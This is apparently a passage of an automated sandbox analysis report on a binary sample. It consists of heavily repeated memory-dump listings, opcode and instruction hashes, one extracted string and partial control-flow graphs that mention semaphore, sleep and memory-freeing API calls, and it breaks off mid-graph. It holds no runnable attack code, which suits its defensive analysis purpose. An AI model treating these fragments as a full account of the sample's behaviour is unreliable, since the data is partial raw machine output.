                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID: &$D
                            • API String ID: 0-1138263919
                            • Opcode ID: 16946f61db68bcfa531c36d6d805463b69b88be8b43f4469fbf2aaa6f77174ea
                            • Instruction ID: e966281431bde8f5ced9cdf8469f613dde040be4f3ae541fddc8c2c659d61bd9
                            • Opcode Fuzzy Hash: 16946f61db68bcfa531c36d6d805463b69b88be8b43f4469fbf2aaa6f77174ea
                            • Instruction Fuzzy Hash: ECC11476A107454BE744CF39CC806AAB7D2EFC4305F148A3AE911C3396EB78D649C7A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 5d0147e1b8e4f5d6d3a745a26ed7d802266730a9675a78caf94c80bb1a58acd4
                            • Instruction ID: 80d21c34bb6ae7158faf62bcd033f9d34088e83b4646355621e00821d873ed2c
                            • Opcode Fuzzy Hash: 5d0147e1b8e4f5d6d3a745a26ed7d802266730a9675a78caf94c80bb1a58acd4
                            • Instruction Fuzzy Hash: 2C315972A007094BE724DE299C4956BB3E4DFC0305F044A3FF952C3342EA38EA49C7A9
                            Strings
                            • NETHASP_00112233445566zz, xrefs: 00442A77
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID: NETHASP_00112233445566zz
                            • API String ID: 0-526728173
                            • Opcode ID: d600ed2a37e33558740473f6b209a886bd2979a05da70e6f98333cf0bf7521f6
                            • Instruction ID: c01a8595a570e52076e6c81c97361f43471d4346ebe204a663ac6df0e50c8e0d
                            • Opcode Fuzzy Hash: d600ed2a37e33558740473f6b209a886bd2979a05da70e6f98333cf0bf7521f6
                            • Instruction Fuzzy Hash: 2731F70E9593C24DE325DB7888107FBAFE29FE6210F5D49BE98D98B783C4294046D3B1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bd94b818cdc8712dc955d815b6b14d439c12b0c554483b827a4191f1f18468a8
                            • Instruction ID: 5621dbd42eb087a3efff43b148d242805c835e3021cf1da33a348ce65f153428
                            • Opcode Fuzzy Hash: bd94b818cdc8712dc955d815b6b14d439c12b0c554483b827a4191f1f18468a8
                            • Instruction Fuzzy Hash: 8E020B7690878A8FD714DF1CC84162AB7E1BFC8304F4A096CEA909B356DB78F915CB85
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 89d31817f79e43d1fcc6de6552c2b922a3367e755c2ee81730d96a6ef8bda629
                            • Instruction ID: 53ccb12187c115fc644893fb2bd5b782b7f6e5df37e2e0993c5105b0d6249dbf
                            • Opcode Fuzzy Hash: 89d31817f79e43d1fcc6de6552c2b922a3367e755c2ee81730d96a6ef8bda629
                            • Instruction Fuzzy Hash: 19020B7690878A8FD714DF1CC84162AB7E1BFC8304F4A096CEA909B356DB78F915CB85
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa0581a7e887880e07d6ed4b153e311fd59c7b35d25d5a62e0b506935308d7da
                            • Instruction ID: 6d36cd6d847ac50dff605874ce029c1b3f790dd0e664c9ca5f43211dfae37df0
                            • Opcode Fuzzy Hash: fa0581a7e887880e07d6ed4b153e311fd59c7b35d25d5a62e0b506935308d7da
                            • Instruction Fuzzy Hash: 2971579698E3C05FD71347B058696917FB0AE23124B5F92DBC8C6CF8A3E54D484AC323
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dfb336ec09bbebb29675f50539243b0cc2fdd3e4537de5a9ff245748efdf1395
                            • Instruction ID: 9aa426ad075d82161b80894cc8baeffa32b3dde6747d47502b9ba796aab667d1
                            • Opcode Fuzzy Hash: dfb336ec09bbebb29675f50539243b0cc2fdd3e4537de5a9ff245748efdf1395
                            • Instruction Fuzzy Hash: 4F51F3756092814BE720DE39D841AEBBBD6DFD9314F09897AE9C8C3302D029D85D87A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 85ce41991173dbadcfdea74fd3bd294495b0c6485591fe382654d4bfbba070e6
                            • Instruction ID: 21d6890e665c97951741c4f196da70ae8bd21b77b76669c31e00aa3f47cb015d
                            • Opcode Fuzzy Hash: 85ce41991173dbadcfdea74fd3bd294495b0c6485591fe382654d4bfbba070e6
                            • Instruction Fuzzy Hash: 07619E719083019FD714DF24D881B6BBBE0FB89319F44482EF88997352D339EA49CB96
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a682b18139214241742368ae0951ac6ff74cfb4a1e3dddf2ab81183e74a6f54c
                            • Instruction ID: e760f3c057393c1c42fa8d829563a35c3de7d9169446fb1d9e2c12d635d1a7f5
                            • Opcode Fuzzy Hash: a682b18139214241742368ae0951ac6ff74cfb4a1e3dddf2ab81183e74a6f54c
                            • Instruction Fuzzy Hash: 7C417BB2A01B454BF318CB2CCC8976BB792DBC4305F148B2ED512D7786DA78A505C3A8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f23e764a258e746145005bb8f228fc192aa5f362aa6b61e6851fcbfe09853e0d
                            • Instruction ID: 53e8721af9d2935ff255f281c9490100fd106ccb408c2b8e94a8cc1d056f0990
                            • Opcode Fuzzy Hash: f23e764a258e746145005bb8f228fc192aa5f362aa6b61e6851fcbfe09853e0d
                            • Instruction Fuzzy Hash: 7AF0F69BA0161F5FC310EE68B8801E3B3DBE7B67A0B1A1461E740C7321E1A11809E254
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1d74de621471113eeeb8add9240d3a41931af28086330595ed0f5070e02ead39
                            • Instruction ID: 3fed552dc0f16c94019d21b909574d6693bb4f651eae2b4a6156c6236d19073f
                            • Opcode Fuzzy Hash: 1d74de621471113eeeb8add9240d3a41931af28086330595ed0f5070e02ead39
                            • Instruction Fuzzy Hash:

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 303 447880-44789b call 4453d0 306 4478ad-4478da call 442840 303->306 307 44789d-4478ac 303->307 310 4478e0-4478e5 306->310 311 447981 306->311 310->311 312 4478eb-4478fa 310->312 313 447986-447988 311->313 312->311 314 447900-44790e 312->314 315 4479dc-447a0a call 4456c0 call 4445a0 313->315 316 44798a-4479bc call 442970 OpenSemaphoreA 313->316 318 447927-44792f 314->318 319 447910-447926 314->319 329 447c70-447c7a 315->329 330 447a10 315->330 316->315 324 4479be-4479db CloseHandle 316->324 318->313 323 447931-44794f ReleaseSemaphore 318->323 326 447951-447967 323->326 327 447968-44797f CloseHandle 323->327 327->313 331 447a12-447a28 call 444d10 330->331 334 447a71-447a80 331->334 335 447a2a-447a2d 331->335 336 447a34-447a48 call 444510 335->336 337 447a2f-447a32 335->337 338 447a4f-447a51 336->338 342 447a4a 336->342 337->336 337->338 338->331 340 447a53-447a55 338->340 343 447a57-447a70 340->343 344 447a81-447a88 340->344 342->338 345 447ab3-447ab8 call 444500 344->345 346 447a8a-447aa5 call 443510 344->346 350 447abd-447ad7 345->350 346->345 351 447aa7-447ab1 call 4444c0 346->351 350->329 352 447add-447ae5 350->352 351->350 352->329 353 447c66 352->353 354 447c27-447c3b 352->354 355 447b40-447b54 352->355 356 447b01-447b15 352->356 357 447aec-447b00 352->357 358 447be8-447bfc 352->358 359 447ba9-447bbd 352->359 360 447b6a-447b7e 352->360 361 447b2b-447b3f 352->361 362 447b94-447ba8 352->362 363 447b55-447b69 352->363 364 447b16-447b2a 352->364 365 447c51-447c65 352->365 366 447c12-447c26 352->366 367 447bd3-447be7 352->367 368 447c3c-447c50 352->368 369 447bfd-447c11 352->369 370 447bbe-447bd2 352->370 371 447b7f-447b93 352->371 353->329
                            Memory Dump Source
                            • Source File: 00000000.00000002.1869733669.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1869693906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1869961548.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870015988.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870032387.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870068280.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870084632.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870101916.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870171034.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870196017.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1870213565.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_biKy3nZEyJ.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 701717f76f5fe287e7d309bb2a5ec2d4c4f1fcacca32e3f437aabca2e8024746
                            • Instruction ID: db78036c0407077dc33b3c98e79fd2754e219730d596cdf3bd1da380166198d1
                            • Opcode Fuzzy Hash: 701717f76f5fe287e7d309bb2a5ec2d4c4f1fcacca32e3f437aabca2e8024746
                            • Instruction Fuzzy Hash: 9C912476B412045FFB24BB18FC86BEA7391E781B36F94113BDE0481290D77F914E86A6

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 374 44a2e0-44a30c call 44b740 377 44a31e-44a370 call 4424e0 * 2 call 442530 374->377 378 44a30e-44a31d 374->378 385 44a382-44a3c9 call 442530 call 4424e0 call 44be20 377->385 386 44a372-44a381 377->386 393 44a3cd-44a42b Sleep 385->393 395 44a432-44a469 393->395 397 44a48d-44a492 395->397 398 44a46b-44a489 call 444570 395->398 400 44a5ae-44a5b2 397->400 401 44a498-44a4a0 397->401 398->397 400->393 402 44a5b8-44a5bd call 44a760 400->402 404 44a4a6-44a4c1 401->404 405 44a5a3-44a5a8 401->405 410 44a5c4-44a5c8 402->410 407 44a4c5-44a4f6 call 442500 404->407 405->395 405->400 414 44a55c-44a561 407->414 415 44a4f8 407->415 412 44a5fd-44a609 410->412 413 44a5ca-44a5d2 410->413 412->410 419 44a60b-44a625 LocalFree * 2 412->419 413->412 416 44a5d4-44a5d9 413->416 417 44a563-44a592 414->417 418 44a59b-44a59d 414->418 420 44a4ff-44a511 call 444570 415->420 421 44a5dc-44a5ea call 444570 416->421 417->418 422 44a594-44a597 417->422 418->405 418->407 423 44a713-44a745 call 4424e0 * 2 419->423 424 44a62b 419->424 431 44a541-44a550 420->431 432 44a513-44a528 call 444570 420->432 441 44a5f1-44a5fb 421->441 442 44a5ec 421->442 422->418 430 44a748-44a75b call 44be20 423->430 429 44a631-44a638 424->429 424->430 436 44a63a-44a63d 